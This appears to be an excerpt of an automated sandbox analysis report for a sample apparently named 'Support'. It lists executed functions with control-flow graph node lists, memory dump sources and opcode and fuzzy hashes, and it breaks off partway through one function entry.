                                                                                                                                          execution_graph 27409 1c518d8 27410 1c518e8 27409->27410 27413 1c519e0 27410->27413 27414 1c519ee 27413->27414 27415 1c51935 27413->27415 27419 1c541e0 27414->27419 27424 1c541f0 27414->27424 27420 1c541e8 27419->27420 27429 5f414c0 27420->27429 27433 5f414b0 27420->27433 27421 1c543ed 27425 1c5420f 27424->27425 27427 5f414c0 RtlGetVersion 27425->27427 27428 5f414b0 RtlGetVersion 27425->27428 27426 1c543ed 27427->27426 27428->27426 27430 5f414ce 27429->27430 27431 5f414d4 27429->27431 27437 5f42d07 27430->27437 27431->27421 27434 5f414c0 27433->27434 27435 5f414d4 27434->27435 27436 5f42d07 RtlGetVersion 27434->27436 27435->27421 27436->27435 27439 5f42d1d 27437->27439 27438 5f42e2c 27438->27431 27439->27438 27440 5f42f23 RtlGetVersion 27439->27440 27441 5f42fca 27440->27441 27441->27431

                                                                                                                                          Executed Functions

                                                                                                                                          Function 05F487D8 Relevance: 1.9, Strings: 1, Instructions: 698COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 66 5f487d8-5f48823 call 5f43690 207 5f48825 call 5f44e40 66->207 208 5f48825 call 5f49450 66->208 209 5f48825 call 5f487d8 66->209 210 5f48825 call 5f487c8 66->210 70 5f4882b-5f4888d call 5f4a0f0 214 5f4888f call 5f4f475 70->214 215 5f4888f call 5f4f55e 70->215 76 5f48895-5f488ff 219 5f48901 call 5f62c90 76->219 220 5f48901 call 5f62c81 76->220 82 5f48907-5f4894b 211 5f4894d call 5f62c90 82->211 212 5f4894d call 5f62c81 82->212 86 5f48953-5f489f4 93 5f49445-5f494e5 call 5f44e40 call 5f49b58 86->93 94 5f489fa-5f48a2f 86->94 113 5f494eb-5f49534 93->113 94->93 97 5f48a35-5f48a6a 94->97 97->93 101 5f48a70-5f48aa5 97->101 101->93 104 5f48aab-5f48ae0 101->104 104->93 107 5f48ae6-5f48b1b 104->107 107->93 112 5f48b21-5f48b3c 107->112 115 5f48b42-5f48b6e 112->115 116 5f48bcb-5f48bde 112->116 123 5f48b70-5f48bb4 115->123 124 5f48bbc-5f48bc5 115->124 118 5f48bf7-5f48c06 116->118 119 5f48be0-5f48bf5 116->119 121 5f48c0c-5f48c33 call 5f649e0 118->121 119->121 127 5f48c35-5f48cac 121->127 128 5f48cae-5f48ccb 121->128 123->124 124->115 124->116 127->128 134 5f48ccd-5f48ce2 127->134 130 5f48ce8-5f49033 128->130 179 5f491cd-5f491e9 130->179 180 5f49039-5f491b1 130->180 134->130 182 5f491f7 179->182 183 5f491eb 179->183 217 5f491b3 call 5f64c90 180->217 218 5f491b3 call 5f64c50 180->218 182->93 183->182 204 5f491b9-5f491c7 204->179 204->180 207->70 208->70 209->70 210->70 211->86 212->86 214->76 215->76 217->204 218->204 219->82 220->82
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074569896.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f40000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: 5bd3622464959e9c7ea725ec7c0854acf58d05f0b0f1ca020e67387ea430b6d0
                                                                                                                                          • Instruction ID: 47f0dbed97dc0f26db9fb1873bea2c23fca29fcdd296899199b920ca1ba0b3f9
                                                                                                                                          • Opcode Fuzzy Hash: 5bd3622464959e9c7ea725ec7c0854acf58d05f0b0f1ca020e67387ea430b6d0
                                                                                                                                          • Instruction Fuzzy Hash: CE624934A41218CFDB15DF64D854B9DBBB2FB89301F20C1A9E909A7351DB79AD82CF90
                                                                                                                                          Function 05F487C8 Relevance: 1.9, Strings: 1, Instructions: 621COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 221 5f487c8-5f48823 call 5f43690 367 5f48825 call 5f44e40 221->367 368 5f48825 call 5f49450 221->368 369 5f48825 call 5f487d8 221->369 370 5f48825 call 5f487c8 221->370 226 5f4882b-5f4888d call 5f4a0f0 374 5f4888f call 5f4f475 226->374 375 5f4888f call 5f4f55e 226->375 232 5f48895-5f488ff 364 5f48901 call 5f62c90 232->364 365 5f48901 call 5f62c81 232->365 238 5f48907-5f4894b 371 5f4894d call 5f62c90 238->371 372 5f4894d call 5f62c81 238->372 242 5f48953-5f489f4 249 5f49445-5f494e5 call 5f44e40 call 5f49b58 242->249 250 5f489fa-5f48a2f 242->250 269 5f494eb-5f49534 249->269 250->249 253 5f48a35-5f48a6a 250->253 253->249 257 5f48a70-5f48aa5 253->257 257->249 260 5f48aab-5f48ae0 257->260 260->249 263 5f48ae6-5f48b1b 260->263 263->249 268 5f48b21-5f48b3c 263->268 271 5f48b42-5f48b6e 268->271 272 5f48bcb-5f48bde 268->272 279 5f48b70-5f48bb4 271->279 280 5f48bbc-5f48bc5 271->280 274 5f48bf7-5f48c06 272->274 275 5f48be0-5f48bf5 272->275 277 5f48c0c-5f48c33 call 5f649e0 274->277 275->277 283 5f48c35-5f48cac 277->283 284 5f48cae-5f48ccb 277->284 279->280 280->271 280->272 283->284 290 5f48ccd-5f48ce2 283->290 286 5f48ce8-5f49033 284->286 335 5f491cd-5f491e9 286->335 336 5f49039-5f491b1 286->336 290->286 338 5f491f7 335->338 339 5f491eb 335->339 362 5f491b3 call 5f64c90 336->362 363 5f491b3 call 5f64c50 336->363 338->249 339->338 360 5f491b9-5f491c7 360->335 360->336 362->360 363->360 364->238 365->238 367->226 368->226 369->226 370->226 371->242 372->242 374->232 375->232
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074569896.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f40000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 0-3916222277
                                                                                                                                          • Opcode ID: 715a028382fb78aa5ede12c10e59d5fbc8c337bddde04d70bf1cc52dc00c76a6
                                                                                                                                          • Instruction ID: fb8a4daecb13a0922557259645580502c27294f1f6e303b1fc03641eaf9a6c8e
                                                                                                                                          • Opcode Fuzzy Hash: 715a028382fb78aa5ede12c10e59d5fbc8c337bddde04d70bf1cc52dc00c76a6
                                                                                                                                          • Instruction Fuzzy Hash: CE423934A41218CFDB15DF24D858B99BBB2FB89301F24C1D9E909A7351DB79AD82CF90
                                                                                                                                          Function 05F42D07 Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 377 5f42d07-5f42de6 390 5f42e58-5f42e6d 377->390 391 5f42de8-5f42dfc 377->391 398 5f42ead-5f42ec8 390->398 399 5f42e6f-5f42e8b 390->399 394 5f42e02 391->394 395 5f42dfe-5f42e00 391->395 396 5f42e05-5f42e26 call 5f42560 394->396 395->396 406 5f42e2c-5f42e57 396->406 407 5f42ef8-5f42f1e 396->407 405 5f42eca-5f42ece 398->405 411 5f42e95-5f42eab 399->411 412 5f42e8d 399->412 409 5f42ed0 405->409 410 5f42ed9 405->410 419 5f42f20-5f42f21 407->419 420 5f42f23-5f42fc8 RtlGetVersion 407->420 409->410 410->407 411->405 412->411 419->420 421 5f42fd1-5f43014 420->421 422 5f42fca-5f42fd0 420->422 426 5f43016 421->426 427 5f4301b-5f43022 421->427 422->421 426->427
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074569896.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f40000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 358dff97320fe6b744f4a61ef2cc4ca485411196d38f6c10c25eea3fe7d2a5de
                                                                                                                                          • Instruction ID: 8424daf9fdaf32af44d087d217f5de2b587d5b8f26e017b1ff6c68412a49579e
                                                                                                                                          • Opcode Fuzzy Hash: 358dff97320fe6b744f4a61ef2cc4ca485411196d38f6c10c25eea3fe7d2a5de
                                                                                                                                          • Instruction Fuzzy Hash: 3581F535A053258FEB119B68C8157EEBFB1EF45300F0480AAD145EB391DB789C45CFA5
                                                                                                                                          Function 05F60CB8 Relevance: 1.2, Instructions: 1214COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 07290df4ae730d4b2522a5cfb5d620e91e702cdedaacf5b70a9138e7c285fa16
                                                                                                                                          • Instruction ID: 7e32fceb1f9a5b807210c45d34eed5db512dd21337ab080e885f7008d7d4b3a1
                                                                                                                                          • Opcode Fuzzy Hash: 07290df4ae730d4b2522a5cfb5d620e91e702cdedaacf5b70a9138e7c285fa16
                                                                                                                                          • Instruction Fuzzy Hash: 01B21735A002089FDB14DF68C984EADBBB6FF88310F258569E959AB365DB34EC41CF50
                                                                                                                                          Function 05F4BA50 Relevance: .8, Instructions: 784COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 722 5f4ba50-5f4ba75 908 5f4ba77 call 5f4ba50 722->908 909 5f4ba77 call 5f4ba41 722->909 725 5f4ba7d-5f4baf2 call 5f4b338 * 2 call 5f4a9d8 737 5f4bbd4-5f4bbde 725->737 738 5f4baf8-5f4bafa 725->738 739 5f4bb00-5f4bb06 738->739 740 5f4bbdf-5f4bc3f 738->740 741 5f4bc46-5f4bcfc 739->741 742 5f4bb0c-5f4bb1e 739->742 740->741 771 5f4bd04-5f4bd0c 741->771 747 5f4bb90-5f4bbc1 call 5f4b7b4 742->747 748 5f4bb20-5f4bb88 742->748 906 5f4bbc3 call 5f4ca88 747->906 907 5f4bbc3 call 5f4ca78 747->907 748->747 765 5f4bbc9-5f4bbce 765->737 765->738 772 5f4bdc0-5f4bdc9 771->772 773 5f4bdd4-5f4bddb 772->773 774 5f4bdcb-5f4bdce 772->774 776 5f4bde1-5f4be20 call 5f4b338 773->776 777 5f4bfbf-5f4bfc8 773->777 774->773 775 5f4bd11-5f4bd1d 774->775 778 5f4bd23-5f4bd3c 775->778 779 5f4bfc9-5f4c03d 775->779 797 5f4be22-5f4be27 776->797 798 5f4be29-5f4be36 776->798 783 5f4bdb3-5f4bdbd 778->783 784 5f4bd3e-5f4bdab 778->784 807 5f4c043-5f4c062 779->807 808 5f4c1dd-5f4c1e7 779->808 783->772 784->783 800 5f4be39-5f4be76 call 5f4a9d8 797->800 798->800 811 5f4bfb0-5f4bfb9 800->811 812 5f4c064-5f4c0c3 call 5f4b338 807->812 813 5f4c0cb-5f4c0da 807->813 811->777 814 5f4be7b-5f4beba 811->814 812->813 813->808 819 5f4c0e0-5f4c119 813->819 829 5f4bf31-5f4bf86 814->829 830 5f4bebc-5f4bf29 814->830 819->808 831 5f4c11f-5f4c122 819->831 829->811 844 5f4bf88-5f4bf8a 829->844 830->829 831->808 833 5f4c128-5f4c12b 831->833 835 5f4c12d-5f4c131 833->835 836 5f4c149-5f4c15b 833->836 838 5f4c133-5f4c137 835->838 839 5f4c13f-5f4c143 835->839 845 5f4c15d-5f4c1c0 836->845 846 5f4c1c8-5f4c1d7 836->846 838->839 839->836 842 5f4c1e8-5f4c23d 839->842 863 5f4c245-5f4c250 842->863 864 5f4c23f 842->864 844->811 847 5f4bf8c-5f4bfab 844->847 845->846 846->808 846->819 847->777 859 5f4bfad 847->859 859->811 865 5f4c252-5f4c259 863->865 866 5f4c25a-5f4c25c 863->866 864->863 865->866 867 5f4c2b2-5f4c31f 866->867 868 5f4c25e-5f4c261 866->868 874 5f4c326-5f4c34d 867->874 868->867 869 5f4c263-5f4c269 868->869 871 5f4c278-5f4c27e 869->871 872 5f4c26b-5f4c270 869->872 873 5f4c284-5f4c294 871->873 871->874 872->871 878 5f4c296-5f4c29c 873->878 879 5f4c2ac-5f4c2b1 873->879 880 5f4c355-5f4c360 874->880 881 5f4c34f 874->881 883 5f4c2a0-5f4c2a2 878->883 884 5f4c29e 878->884 885 5f4c362-5f4c369 880->885 886 5f4c36a-5f4c36c 880->886 881->880 883->879 884->879 885->886 888 5f4c36e-5f4c371 886->888 889 5f4c3a9-5f4c3f1 886->889 888->889 890 5f4c373-5f4c379 888->890 896 5f4c3f8-5f4c40b 889->896 892 5f4c388-5f4c38e 890->892 893 5f4c37b-5f4c380 890->893 895 5f4c390-5f4c3a6 892->895 892->896 893->892 906->765 907->765 908->725 909->725
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074569896.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f40000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 94475645f71fe9c4e24dabb0346a7d3826d1127cc09adb81ce8d03c0a3050494
                                                                                                                                          • Instruction ID: dcb76090d7b7c9db15254f8953243e9435e0fc546f105a761dc7cf92e771e204
                                                                                                                                          • Opcode Fuzzy Hash: 94475645f71fe9c4e24dabb0346a7d3826d1127cc09adb81ce8d03c0a3050494
                                                                                                                                          • Instruction Fuzzy Hash: 28529274A006059FCB15DF69C890AAEBBF2FF88310B148569E516EB3A1DB34ED45CB90
                                                                                                                                          Function 01C57A10 Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 0 1c57a10-1c57a1a 1 1c57a1c-1c57a1e 0->1 2 1c57a1f-1c57a32 0->2 1->2 3 1c57a34-1c57a36 2->3 4 1c57a37-1c57a3a 2->4 3->4 5 1c57a3c 4->5 6 1c57a3f-1c57a7f 4->6 5->6 11 1c57a81-1c57a95 6->11 12 1c57abd-1c57ad5 6->12 17 1c57a97 11->17 18 1c57a9e-1c57abb 11->18 15 1c57ad7-1c57aeb 12->15 16 1c57b13-1c57b2b 12->16 24 1c57af4-1c57b11 15->24 25 1c57aed 15->25 22 1c57b2d-1c57b41 16->22 23 1c57b69-1c57b8e 16->23 17->18 18->12 30 1c57b43 22->30 31 1c57b4a-1c57b67 22->31 34 1c57b90-1c57ba4 23->34 35 1c57bcc-1c57c05 23->35 24->16 25->24 30->31 31->23 40 1c57ba6 34->40 41 1c57bad-1c57bca 34->41 47 1c57c07-1c57c1b 35->47 48 1c57c43-1c57c7c 35->48 40->41 41->35 51 1c57c24-1c57c41 47->51 52 1c57c1d 47->52 58 1c57c7e-1c57c92 48->58 59 1c57cba-1c57cc9 48->59 51->48 52->51 62 1c57c94 58->62 63 1c57c9b-1c57cb8 58->63 62->63 63->59
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: #!$K6$7
                                                                                                                                          • API String ID: 0-185628103
                                                                                                                                          • Opcode ID: 0bd16ec92db2b0e0fc5e1fdb33b74627367e8826e9d7cfc64ec513cac703dc64
                                                                                                                                          • Instruction ID: c57c350c668e40c836aded795a9d78ed2c739023a3daa303479cb017493da75d
                                                                                                                                          • Opcode Fuzzy Hash: 0bd16ec92db2b0e0fc5e1fdb33b74627367e8826e9d7cfc64ec513cac703dc64
                                                                                                                                          • Instruction Fuzzy Hash: 696180757003468BC746AB68D49066E3BE3FBC4650398C51AE415CB381FF78DD45DB94
                                                                                                                                          Function 05F68935 Relevance: .6, Instructions: 551COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 910 5f68935-5f68d6c call 5f68914 call 5f68e10 915 5f68d72-5f68db0 910->915 920 5f68db2 915->920 921 5f68dbb-5f68e08 915->921 920->921 924 5f68e0a-5f68e0b 921->924
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8438e5c25fe1be20ba8be105423bcefa107511ef82bde5bee00696755bf25dde
                                                                                                                                          • Instruction ID: cf9952037647aaa83141c131b95d510d040dd49209fb7e648f3d3c98afe067e5
                                                                                                                                          • Opcode Fuzzy Hash: 8438e5c25fe1be20ba8be105423bcefa107511ef82bde5bee00696755bf25dde
                                                                                                                                          • Instruction Fuzzy Hash: DF118175B052148FC715DB28C46969D7BF2AF4A210B2540AAD442EB7A5CB399C42CBA1
                                                                                                                                          Function 05F62C90 Relevance: .3, Instructions: 345COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 926 5f62c90-5f62cf8 930 5f62d61-5f62d67 926->930 931 5f62cfa 926->931 1010 5f62d6a call 5f62c90 930->1010 1011 5f62d6a call 5f62c81 930->1011 932 5f62cfd-5f62d03 931->932 934 5f62d89-5f62de8 932->934 935 5f62d09-5f62d13 932->935 933 5f62d70-5f62d86 call 5f62820 947 5f62e1a-5f62e1f call 5f4ff81 934->947 948 5f62dea-5f62df9 934->948 935->934 937 5f62d15-5f62d1c call 5f60848 935->937 941 5f62d21-5f62d5f 937->941 941->930 941->932 950 5f62e25-5f62e47 947->950 951 5f62ed6-5f62eff 948->951 952 5f62dff-5f62e0a 948->952 956 5f62e4d 950->956 957 5f62ec9-5f62ed3 950->957 958 5f62f05-5f62f07 951->958 959 5f62fb0-5f62fd5 951->959 952->951 953 5f62e10-5f62e18 952->953 953->947 953->948 960 5f62e50-5f62e66 956->960 961 5f62fdc-5f62fe0 958->961 962 5f62f0d-5f62f11 958->962 959->961 971 5f62e6f 960->971 972 5f62e68-5f62e6d 960->972 966 5f62fe2-5f62fe8 961->966 967 5f62fea 961->967 962->961 963 5f62f17-5f62f1f 962->963 969 5f62f25-5f62f27 963->969 970 5f63023-5f6307b 963->970 968 5f62ff0-5f6301c 966->968 967->968 968->970 973 5f62f37-5f62f3b 969->973 974 5f62f29-5f62f31 969->974 1005 5f63083 970->1005 1006 5f6307d 970->1006 975 5f62e74-5f62e7a 971->975 972->975 978 5f62f3d-5f62f41 973->978 979 5f62fa9-5f62fad 973->979 974->970 974->973 980 5f62eb2-5f62ec7 975->980 981 5f62e7c 975->981 983 5f62f43-5f62f57 978->983 984 5f62f59-5f62f6d 978->984 980->957 980->960 985 5f62e7f-5f62e85 981->985 983->984 994 5f62f76-5f62f78 983->994 984->994 996 5f62f6f-5f62f73 984->996 985->951 988 5f62e87-5f62eb0 985->988 988->980 988->985 997 5f62f91-5f62fa1 994->997 998 5f62f7a-5f62f8e 994->998 1007 5f62fa3 call 5f63198 997->1007 1008 5f62fa3 call 5f63188 997->1008 1006->1005 1007->979 1008->979 1010->933 1011->933
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 779ca0badb40eb155596fe1d3ba552ecfcc67a1172569a837dc4a8273f3b963f
                                                                                                                                          • Instruction ID: 6a6f770dcf28994c140f1c36ecb5e53e795c13b01beb44d95cd987f32fb8d9f1
                                                                                                                                          • Opcode Fuzzy Hash: 779ca0badb40eb155596fe1d3ba552ecfcc67a1172569a837dc4a8273f3b963f
                                                                                                                                          • Instruction Fuzzy Hash: F3C13D35B00119DFCB14DFA9C984AAEBBF6FB88310F148469E915A7354DB34ED41CBA1
                                                                                                                                          Function 05F6645F Relevance: .3, Instructions: 344COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1012 5f6645f-5f6652d 1021 5f6657e-5f66593 1012->1021 1022 5f6652f-5f66547 1012->1022 1027 5f666a6-5f666ad 1021->1027 1028 5f66599-5f6659f 1021->1028 1025 5f66550-5f6657c 1022->1025 1026 5f66549 1022->1026 1025->1021 1026->1025 1029 5f66734-5f6673e 1027->1029 1030 5f666b3 1027->1030 1031 5f665a5-5f665fa 1028->1031 1032 5f66821-5f66871 1028->1032 1033 5f66744 1029->1033 1034 5f66819-5f66820 1029->1034 1036 5f666b6-5f666bc 1030->1036 1031->1032 1057 5f66600-5f66634 1031->1057 1064 5f66877-5f6687b 1032->1064 1065 5f66873-5f66875 1032->1065 1038 5f66747-5f6674f 1033->1038 1036->1032 1040 5f666c2-5f666ea 1036->1040 1038->1032 1041 5f66755-5f66761 1038->1041 1040->1032 1053 5f666f0-5f66701 1040->1053 1044 5f66807-5f66813 1041->1044 1045 5f66767-5f66774 1041->1045 1044->1034 1044->1038 1045->1032 1048 5f6677a-5f667a5 1045->1048 1048->1032 1063 5f667a7-5f667b3 1048->1063 1053->1032 1056 5f66707-5f66732 1053->1056 1056->1029 1056->1036 1061 5f66686-5f666a0 1057->1061 1062 5f66636-5f6664e 1057->1062 1061->1027 1061->1028 1074 5f66657-5f66684 1062->1074 1075 5f66650 1062->1075 1063->1032 1066 5f667b5-5f667cd 1063->1066 1068 5f668b1-5f668fb 1064->1068 1069 5f6687d-5f66880 1064->1069 1070 5f66882-5f668b0 1065->1070 1066->1032 1067 5f667cf-5f667e2 1066->1067 1076 5f667e8-5f667f2 1067->1076 1086 5f66937-5f66950 1068->1086 1087 5f668fd-5f66935 1068->1087 1069->1070 1074->1061 1075->1074 1076->1032 1080 5f667f4-5f66801 1076->1080 1080->1044 1080->1045 1090 5f66952 1086->1090 1091 5f6695b 1086->1091 1087->1086 1090->1091
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1074762013.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_5f60000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ccd0eacc6349ef4ee5c30a2de2f1f3f2e807e9b535183f7539cf221083624e20
                                                                                                                                          • Instruction ID: ac38dad2f931358b854eea002143136c0b344cbfd627c17d24d1ea9c187b23be
                                                                                                                                          • Opcode Fuzzy Hash: ccd0eacc6349ef4ee5c30a2de2f1f3f2e807e9b535183f7539cf221083624e20
                                                                                                                                          • Instruction Fuzzy Hash: CEE13A75A00616CFCB04DF68C584AAAB7F2FF88300B55C569E949EB365EB34ED41CB90
                                                                                                                                          Function 01C5DC59 Relevance: .3, Instructions: 296COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1094 1c5dc59-1c5dc7c 1095 1c5dc7f-1c5dc83 1094->1095 1096 1c5dc85-1c5dc9e 1095->1096 1097 1c5dca1-1c5dcd1 1095->1097 1159 1c5dcd4 call 1c5deb0 1097->1159 1160 1c5dcd4 call 1c5dc59 1097->1160 1100 1c5dcda-1c5dcf2 1102 1c5de94-1c5dec9 1100->1102 1103 1c5dcf8-1c5dd07 1100->1103 1111 1c5df7c-1c5df83 1102->1111 1112 1c5decf-1c5dee2 1102->1112 1104 1c5dd0c-1c5dd1c 1103->1104 1104->1102 1106 1c5dd22-1c5dd33 1104->1106 1108 1c5dd35-1c5dd41 1106->1108 1109 1c5dd43 1106->1109 1110 1c5dd45-1c5dd5f 1108->1110 1109->1110 1118 1c5dd61 1110->1118 1119 1c5dd09 1110->1119 1113 1c5df86-1c5dfaa 1112->1113 1114 1c5dee8-1c5defc 1112->1114 1124 1c5dfb0-1c5dfb2 1113->1124 1125 1c5dfac-1c5dfae 1113->1125 1114->1113 1117 1c5df02-1c5df10 1114->1117 1121 1c5df21 1117->1121 1122 1c5df12-1c5df1f 1117->1122 1123 1c5dd66-1c5dd76 1118->1123 1119->1104 1126 1c5df23-1c5df35 1121->1126 1122->1126 1123->1102 1127 1c5dd7c-1c5dd8d 1123->1127 1128 1c5dfb4-1c5dfb6 1124->1128 1129 1c5dfb8-1c5dfe4 1124->1129 1125->1124 1157 1c5df36 call 1c5deb0 1126->1157 1158 1c5df36 call 1c5dc59 1126->1158 1131 1c5dd9d 1127->1131 1132 1c5dd8f-1c5dd9b 1127->1132 1128->1129 1134 1c5dd9f-1c5ddb9 1131->1134 1132->1134 1133 1c5df38-1c5df3a 1133->1111 1136 1c5df3c-1c5df79 1133->1136 1140 1c5dd63 1134->1140 1141 1c5ddbb-1c5ddc1 1134->1141 1136->1111 1140->1123 1142 1c5de25-1c5de36 1141->1142 1143 1c5ddc3-1c5ddc6 1141->1143 1147 1c5de5c-1c5de62 1142->1147 1148 1c5de38-1c5de3e 1142->1148 1145 1c5de13-1c5de1f 1143->1145 1146 1c5ddc8-1c5de10 1143->1146 1145->1104 1145->1142 1146->1145 1151 1c5de64-1c5de70 1147->1151 1152 1c5de78-1c5de7b 1147->1152 1149 1c5de54-1c5de5a 1148->1149 1150 1c5de40-1c5de4c 1148->1150 1153 1c5de7e-1c5de84 1149->1153 1150->1149 1151->1152 1152->1153 1153->1095 1155 1c5de8a-1c5de91 1153->1155 1157->1133 1158->1133 1159->1100 1160->1100
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1068940360.0000000001C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_1c50000_Support.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6c641f11c8fd719dc92d76c5279557c99aab176f80cdc7c62ccd02de5b378b8c
                                                                                                                                          • Instruction ID: f5b33f938209a78a5bd86dfbbb0a87ac5df63e0970cae99d0c30e52c5d257b85
                                                                                                                                          • Opcode Fuzzy Hash: 6c641f11c8fd719dc92d76c5279557c99aab176f80cdc7c62ccd02de5b378b8c
                                                                                                                                          • Instruction Fuzzy Hash: E6C10575A0160ADFCF01CFA8C9808AEBBB2FF49314B248459F906A7311D731ED56CBA5
                                                                                                                                          Function 05F651D9 Relevance: .3, Instructions: 290COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
